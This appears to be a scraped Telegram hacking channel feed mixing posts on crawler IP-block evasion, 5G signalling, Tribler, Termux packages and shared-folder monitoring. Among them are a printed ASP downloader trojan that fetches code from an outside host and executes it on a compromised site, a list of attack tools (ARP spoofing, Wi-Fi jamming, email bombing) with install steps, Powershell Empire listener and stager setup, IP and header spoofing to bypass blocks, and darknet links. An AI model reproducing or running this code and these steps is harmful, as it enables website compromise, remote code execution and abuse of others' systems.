UNDERCODE COMMUNITY
2.67K subscribers
1.23K photos
31 videos
2.65K files
79.5K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘methods to solve blocked IP (website)


1️⃣Method
1.

Due to the company's project needs, we have collected Google map data and some large-scale website data.
The experience is as follows:

1. IP must be required, as @alswl said is very correct, ADSL. If you have the conditions, you can actually apply for extra IP from the computer room.

2. Deploy a proxy server on the machine with an external network IP.

3. Your program uses rotation training to replace the proxy server to access the website you want to collect.

Benefits:

1. The program logic changes little, only the agent function is needed.

2. According to the blocking rules of the other party's website, you only need to add more agents.

3. Even if the specific IP is blocked, you can directly log off the proxy server and it will be OK, and the program logic does not need to be changed.

2️⃣Method 2.
Some websites have weak preventive measures. You can disguise the IP and modify the X-Forwarded-for (it looks like this spelling...) to bypass it.
For most websites, if you want to crawl frequently, you still need more IPs. The solution I prefer is that foreign VPSs are equipped with multiple IPs, and IP switching is realized through default gateway switching, which is much more efficient than HTTP proxy, and is estimated to be more efficient than ADSL switching in most cases.

3️⃣Method 3.
ADSL + script, monitor whether it is blocked, and then constantly switch ip
settings to query frequency limits. The
orthodox approach is to call the service interface provided by the website.

4️⃣Method 4. People
with more than 8 years of crawling experience tell you that domestic ADSL is the kingly way. Apply for more lines and distribute them in different telecommunications districts. It is better to be able to cross provinces and cities. Write your own disconnection redial components. Write your own dynamic IP tracking service, remote hardware reset (mainly for ADSL modems to prevent its downtime), other task allocation, data recovery, are not a big problem. Mine has been running stably for several years, and it's done!

5️⃣Method 5.
1 User agent disguise and rotation
2 Use proxy ip and rotation
3 Cookies processing, some websites have a looser policy on login users.
Friendly reminder: Consider the burden of crawlers on other websites, be a responsible crawler :)

6️⃣Method 6.
As much as possible The simulated user behavior:
1. The UserAgent is changed frequently;
2. The visit time interval is set longer, and the visit time is set to a random number;
3. The order of visiting pages can also be random.

7️⃣Method 7
The basis for website blocking is generally unit The number of visits to a specific IP within a period of time.
I group the collected tasks according to the IP of the target site by controlling the number of tasks sent by each IP in a unit time to avoid being blocked. Of course, the premise is that you collect a lot Website. If you only collect one website, it can only be achieved through multiple external IPs.

6️⃣Method 8
1. Pressure control on crawler crawling;
2. You can consider using a proxy to access the target site.
-Reduce the frequency of crawling, set a longer time, and use random numbers for access time
-Switch UserAgent frequently (simulate browser access)-Multi
-page data, random access and then grab data
-Change user IP

@undercodeTesting
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘[5G Core Network] Deregistration procedures
we
should write & send this one in 2021 :)

1) Deregistratio Request
The UE sends a NAS message deregistration request (5G-GUTI, Deregistration type (eg Switch off), Access Type) to the AMF. The UE has a logical connection to the AMF and needs to go through the RAN

> Access type indicates whether the logout process is applicable to 3GPP access, non-3GPP access, or applicable to both types of access served by the same AMF (see TS 23.501 [2]). AMF will call the logout procedure for the target access indicated by the UE.

2) Nsmf_PDUSession_ReleaseSMContext Request
[Conditional] AMF to SMF, Comprehensive, SUPI, PDU Session ID

If the UE has no established PDU session on the target access indicated in step 1, steps 2 to 5 are not executed. For each PDU session, AMF sends a Nsmf_PDUSession_ReleaseSMContext request (SUPI, PDU Session ID) message to SMF to release all PDU sessions belonging to UE's target access to SMF.



3) SMF releases all resources
[Conditional] AMF to SMF, the IP address/prefix assigned to the PDU session and releasing the corresponding user plane resources:

a) N4 Session Release Request
[Conditional] SMF to UPF, SMF sends the N4 Session Release Request (N4 Session ID) message to the UPF of the PDU session. UPF will discard all remaining data packets of the PDU session and release all tunnel resources and contexts related to the N4 session.

b) N4 Session Release Response
[Conditional] UPF to SMF, UPF confirms the N4 session release request by sending the N4 Session Release Response (N4 Session ID) message to the SMF.


4) Nsmf_PDUSession_ReleaseSMContext Response
[Conditional] SMF to AMF, SMF responds with Nsmf_PDUSession_ReleaseSMContext

a) SM Policy Association Termnation
[Conditional] If the dynamic PCC applies the session, the SMF will execute the SM policy association termination process defined in Section 4.16.6.

b-c) Nudm_SDM_Unsubscribe Nudm_UECM Deregistration
[Conditional] If it is the last PDU session that the SMF is processing for the UE associated (DNN, S-NSSAI), the SMF unsubscribes the session management subscription data change notification from the UDM through the Nudm_SDM_Unsubscribe service operation. SMF calls the Nudm_UECM_Deregistration service operation so that UDM deletes the association between the SMF ID stored in the SMF and the associated DNN and PDU session ID.

6) AMF-initiated AM Policy Association Termination
[Conditional] If there is any association with this UE and PCF, and the UE is no longer registered through any access, AMF executes the AM policy association termination process initiated by AMF defined in section 4.16.3.2, and deletes the association with PCF .

a) AMF-initiated UE Policy Association Termination
[Conditional] If there is any association with this UE and PCF, and the UE is no longer registered through any access, AMF executes the AM policy association termination process initiated by AMF defined in section 4.16.3.2, and deletes the association with PCF .


7) De-registration Accept
[Conditional] AMF to UE, AMF will send the NAS message "Logout Accept" to the UE according to the logout type, that is, if the logout type is "Off", AMF will not send the "Logout Accept" message.

8) Signaling Connection Release
[Conditional] AMF to AN, N2 UE Context Release Request (Cause)

@undercodeTesting
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Using Pastebin Sites for Pen Testing Reconnaissance.pdf
115.7 KB
the text-sharing sites mentioned above in your search, mining them for records related to the target, such as:

1) Stolen data, such as credit card numbers or PII Source code snippets that might reveal website inner-workings

2) Conguration details of network devices

3)Employee names, contact details and job functions
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Tribler is a torrent that cannot be blocked

> The Netherlands has developed a torrent network that cannot be blocked. The founder and project manager, Professor Johan Puvelse, said that in order to disable Tribler, all you need to do is turn off the entire Internet, and the network itself will exist as long as at least one computer is connected to it.

> The impossibility of blocking it is due to the lack of central servers, and the search for information occurs without referring to indexing sites. Tribler is completely built on the idea of ​​direct communication between clients and does not depend on central servers. The built-in network of anonymizers is responsible for the safety of users, similar in principle to Tor, which allows you to bypass the restrictions of cellular operators on unlimited tariffs.

> The application establishes contact with several pre-configured clients (peers) and asks them for information about available torrents, as well as a list of associated clients. The procedure is repeated again for new clients, and over time a database of active clients and their torrents is accumulated.

> To catalog torrents, Tribler uses channels, which are lists of torrents grouped by other users according to some criteria. Each channel has a rating that is determined by the users themselves. The application filters out channels with the lowest ratings, which helps to fight spam and low-quality content. All channels and torrents participate in the search, which allows you to quickly find the data you need in the Tribler network.

> Tribler is an open source software that can be found on github under the open developer profile. The client itself is fully available on the official website of the developer tribler.org .

@undercodeTesting
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘METHODE FOR INJECT TROJAN :
This time the user is a downloader Trojan. The hacker inserted the following code under foot.asp in the root directory of the website through the website upload vulnerability:


<%
'by*
aming Function Gethtml(url)
Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
ObjXMLHTTP.Open "GET",url,False
ObjXMLHTTP.setRequestHeader "User-Agent",url
ObjXMLHTTP.send
Gethtml=ObjXMLHTTP .responseBody
Set ObjXMLHTTP=Nothing
set objStream = Server.CreateObject("Adodb.Stream")
objStream.Type = 1
objStream.Mode = 3
objStream.Open
objStream.Write Gethtml
objStream.Position = 0
objStream.Type = 2
objStream.Charset = "gb2312"
Gethtml = objStream.ReadText
objStream.Close
set objStream=Nothing
End Function
execute(Gethtml("http://www.pornhome.com/dy7749/xmlasaquan.txt"))
%>



@undercodeTesting
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
πŸ¦‘New Deep websites : 7/24 & 23/24 online :

http://j7hackfestgaeuvv.onion/ – Hackfest 2017 | Conferences and CTF, November 3-4th | Trainings, October 31st-November 1-2nd | Largest hacking event in Canada | Quebec City, Canadaβœ…

http://4sf3dqfwpcpdnj6g.onion/ – FHT – Free Hacking Toolsβœ…

http://74ypjqjwf6oejmax.onion/ – Beneath VT – Exploring Virginia Tech’s Steam Tunnels and BeyondπŸ”„


http://edramalpl7oq5npk.onion/Main_Page – Encyclopedia Dramaticaβœ…

http://ih4pgsz3aepacbwl.onion/ – Hushboxβœ…

http://ad52wtwp2goynr3a.onion/# – Dark Like My Soul

http://tns7i5gucaaussz4.onion/ – FreeForβœ…
RDP HACKING METHODE :))
Forwarded from UNDERCODE NEWS
TSMC demonstrates the powerful 5nm chip, this year iPhone 12 used
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘HACKING TOOL :
#gitTopic
TERMUX(root)-LINU-WINDOWS:

apache
_users
arp_dos
arp_monitor
arp_spoof
bluetooth_pod
cloudflare_resolver
dhcp_dos
dir_scanner
dns_spoof
email_bomber
hostname_resolver
mac_spoof
mitm
network_kill
pma_scanner
port_scanner
proxy_scout
whois
web_killer
web_scout
wifi_jammer
zip_cracker
rar_cracker
wordlist_gen

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

1) git clone https://github.com/4shadoww/hakkuframework.git

2) cd hakkuframework

3) sudo ./install -i

4) choose option

that's all

Verified βœ…
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘INSTAGRAM REAL FOLLOWER APPS IOS/ANDROID :
#Updated list :

https://itunes.apple.com/us/app/priime/id934587545?mt=8

https://itunes.apple.com/us/app/snapseed/id439438619?mt=8

https://pixlr.com/

https://itunes.apple.com/us/app/litely/id850707754?mt=8

https://itunes.apple.com/us/app/followers-for-instagram/id597077652?mt=8

https://itunes.apple.com/us/app/followers-for-instagram/id597077652?mt=8

https://itunes.apple.com/us/app/social-rocket-for-instagram-get-followers-report/id1210349595?mt=8

https://itunes.apple.com/us/app/social-rocket-for-instagram-get-followers-report/id1210349595?mt=8

https://www.crowdfireapp.com/

https://itunes.apple.com/us/app/crowdfire/id528626975?mt=8

https://itunes.apple.com/us/app/tracker-for-instagram-analyze-followers-likes/id1246192822?mt=8

https://itunes.apple.com/us/app/tracker-for-instagram/id1246192822?mt=8

https://itunes.apple.com/us/app/followers-likes-on-instagram/id862228531?mt=8

https://itunes.apple.com/us/app/followers-likes-on-instagram/id862228531?mt=8

https://play.google.com/store/apps/details?id=ru.wyeg.instatag&hl=en

https://play.google.com/store/apps/details?id=ru.wyeg.instatag&hl=en

https://play.google.com/store/apps/details?id=socials.com.application&hl=en

https://play.google.com/store/apps/details?id=socials.com.application&hl=en

https://play.google.com/store/apps/details?id=socials.com.application&hl=en
https://itunes.apple.com/us/app/magic-liker-for-like-tags/id1218151216?mt=8

https://www.topappslike.com/magic-liker-for-instagram-likes/https://hootsuite.com/instagram

https://pro.iconosquare.com/

https://itunes.apple.com/us/app/iconosquare/id1150428618?mt=8

https://unionmetrics.com/free-tools/instagram-
account-checkup-gen/

https://unionmetrics.com/free-tools/instagram-account-checkup-gen/

https://squarelovin.com/business/home/

https://squarelovin.com/business/home/instagram-insights/

βœ…2020
enjoyβ€οΈπŸ‘πŸ»
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
Ants group earn a net income of 12448.74 million dollar/1 day in 2020
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘how can we protect the security of shared folders in the local area network? This requires the following means:

> Method 1: Record the shared file access log and check who is accessing my shared file in real time.

γ€€γ€€
Sometimes, I shared a file on a Windows XP computer. Perhaps, for some reason, we need to know who is accessing this file now. For example, when we turn off the computer, the system will prompt how many users are connected to this shared folder. We need to know who the users are and how should this be achieved? In fact, this is relatively simple, we can use the built-in functions of the operating system to achieve. You can follow the steps below.

γ€€γ€€
> Step 1: Open the control panel, management tools, computer management (local), system tools, and then select the shared folder. In this window, there is a "session" option. Double-click to open this option. In the window on the right, it will show which computers are accessing your computer. However, in this window, you can only see which computers are connected to your computer, and you don't know which shared files they are accessing.

> Step 2: Select "System Tools", Shared Folder, and Open File in turn. At this time, some shared resources on this computer and which computers are accessing them will be displayed in the window. At the same time, some useful information will be displayed in this window, such as which shared file was opened; when did it start to access; and how much time has been idle.
γ€€γ€€
In addition, we may sometimes for certain purposes, such as employees may think that this person cannot access this file. At this point, we can right-click the session directly, and then select close session from the shortcut menu, we can prevent this user from accessing the shared file without affecting the normal access of other users.

> This feature is sometimes very useful. As we all know, the system has a maximum number of connections. Sometimes employees will reflect, why can't I ask your shared files. We saw that it turned out that the number of connections reached the upper limit. At this point, we can query how many users are currently connected to my computer in this way, and then we can disconnect some users who do not need access and allow users who need access to connect.

Verified βœ…
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
There is a speculation that TikTok has invited Netflix to negotiate on the sale of TikTok's US company #international
Process Memory and Memory Corruptions.pdf
1.1 MB
The prerequisite for this part of the tutorial is a basic understanding of ARM assembly (covered in the rst tutorial series β€œARM Assembly Basicsβ€œ). In this chapter you will get an introduction into the memory layout of a process in a 32-bit Linux environment. After that you will learn the fundamentals of Stack and Heap related memory corruptions and how they look like in a debugger
#exploitation
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ALL NEW TERMUX PACKAGES :

x11-repo Termux repo for x11 packages pkg
install x11-repo

vnc server For graphical output pkg install tigervnc

openbox wm Openbox Window Manager pkg

install openbox obconf

xsetroot Set color background for X pkg install xorg-xsetroot


xterm X terminal pkg install xterm

xcompmgr Composite manager or desktop effects pkg install xcompmgr

xfsettingsd The settings daemon, to set themes & icons pkg install xfce4-settings

polybar Easy and fast status bar pkg install polybar libnl

st Suckless/Simple terminal pkg install st

geany Graphical text editor pkg install geany

thunar File manager (optional) pkg install thunar

pcmanfm File manager pkg install pcmanfm

rofi An application launcher pkg install rofi

feh Simple image viewer pkg install feh

neofetch System info program pkg install neofetch

git VCS, for cloning repos pkg install git

wget Command line downloader pkg
install wget

curl To transfer/get internet data pkg install curl

zsh A very good shell pkg install zsh

vim Command line text editor (! - hard to exit :D) pkg install vim

htop System monitor (optional) pkg install htop

elinks Command line web browser (optional) pkg install elinks

mutt Command line mail client (optional) pkg install mutt

mc Command line file manager (optional) pkg install mc

ranger Command line file manager (optional) pkg install ranger

cmus Command line music player (optional) pkg install cmus

cava Console-based audio visualizer (optional) pkg install cava

pulseaudio Sound system & audio server (optional) pkg install pulseaudio

Verified βœ…
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Install/Setup Powershell Empire on Kali Linux


πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :


1) Spin up a Kali Linux

2) cd /opt

3) git clone https://github.com/EmpireProject/Empire.git

4) cd Empire

5) ./setup/install.sh

A. Hit enter to set a random server password

6) ./empire Setup/Configure HTTP listener

1. listeners

2. uselistener http A. set Name http80 B. set Host http://<IP addr of Kali Linux>:80

C. execute

D. back Create Powershell stager

7) usestager multi/launcher http80 2. execute

8) Copy Powershell output string Detonate Powershell stager

1. Spin up a Windows 10 VM and login

2. Open a Powershell prompt as Administrator

3. Copy Powershell output string and hit enter

enjoyβ€οΈπŸ‘πŸ»
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁